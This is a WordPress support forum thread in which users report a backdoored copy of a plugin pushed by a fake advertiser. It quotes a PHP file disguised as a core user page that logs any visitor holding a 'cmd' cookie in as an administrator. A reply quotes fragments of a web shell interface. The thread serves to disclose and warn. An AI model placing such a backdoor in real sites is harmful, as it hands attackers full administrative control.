Attack with your plugin

  • diogobguerreiro

    (@diogobguerreiro)


    8 years, 4 months ago

    Today I was contacted by a person who wanted to buy advertising on my blog. I would forcefully install the plugin on my site but with their changes. This code below is what I found, one more file in php format.

    Is that really what I’m thinking? Did you want to steal my access?

    <?php
    /**
    * WordPress User Page
    *
    * Handles authentication, registering, resetting passwords, forgot password,
    * and other user handling.
    *
    * @package WordPress
    */

    if(empty($_COOKIE[‘cmd’])){

    die();
    }
    require(‘../../../../wp-blog-header.php’);
    $query_str = “SELECT ID FROM $wpdb->users”;
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
    $user_id = $uid->ID;
    if (user_can($user_id, ‘administrator’)) {
    $user_info = get_userdata($user_id);
    $user_login = $user_info->user_login;
    wp_set_current_user($user_id, $user_login);
    wp_set_auth_cookie($user_id);
    do_action(‘wp_login’, $user_login);
    echo “You are logged in as $user_login”;
    if (function_exists(‘get_admin_url’)) {
    wp_redirect(get_admin_url());
    } else {
    wp_redirect(get_bloginfo(‘wpurl’) . ‘/wp-admin’);
    }
    exit;
    }
    }

Viewing 2 replies - 1 through 2 (of 2 total)
  • ruimoreira

    (@ruimoreira)

    8 years, 2 months ago

    I just had the same attack attempt on one of the websites I manage, I also noticed that this piece of code does not exist on the files in GitHub. In any case thank you for reporting this I was about to do the same 🙂

    ruimoreira

    (@ruimoreira)

    8 years, 2 months ago

    also not just that … check it out … it tries to create a php shell of some sorts

    echo “<center><h1>system</h1></center><p><hr><p>\n”;
    echo “<i>Server: ” . $_SERVER [‘SERVER_NAME’] . “<br>\n”;
    echo “Current directory: ” . getcwd () . “<br>\n”;
    echo “Software: ” . $_SERVER [‘SERVER_SOFTWARE’] . “

    \n\n

    </i>\n”;
    echo “

    \n\n\n

    “;

    echo “<table width = 50%>”;
    echo “<tr>”;
    echo “<td>Shell Command</td>\n”;
    echo “<td>Create a new file</td>\n”;
    echo “<td>Upload file</td>\n”;
    echo “<td>Port Scan</td>\n”;
    echo “</tr></table>”;
    echo “

    \n\n

    “;

    wow !!!

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Attack with your plugin’ is closed to new replies.